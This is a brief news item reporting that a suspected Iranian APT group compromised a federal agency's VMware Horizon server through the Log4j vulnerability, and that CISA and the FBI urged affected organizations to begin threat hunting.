Suspected Iranian APT accessed federal server via Log4j vulnerability

A federal agency server was compromised by a suspected Iranian advanced persistent threat (APT) group via the Log4j vulnerability. The threat actors breached a VMware Horizon server, installed cryptomining software, accessed domain control, compromised credentials, and installed a reverse proxy service. The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation urged affected organizations to assume compromise and initiate threat hunting activities.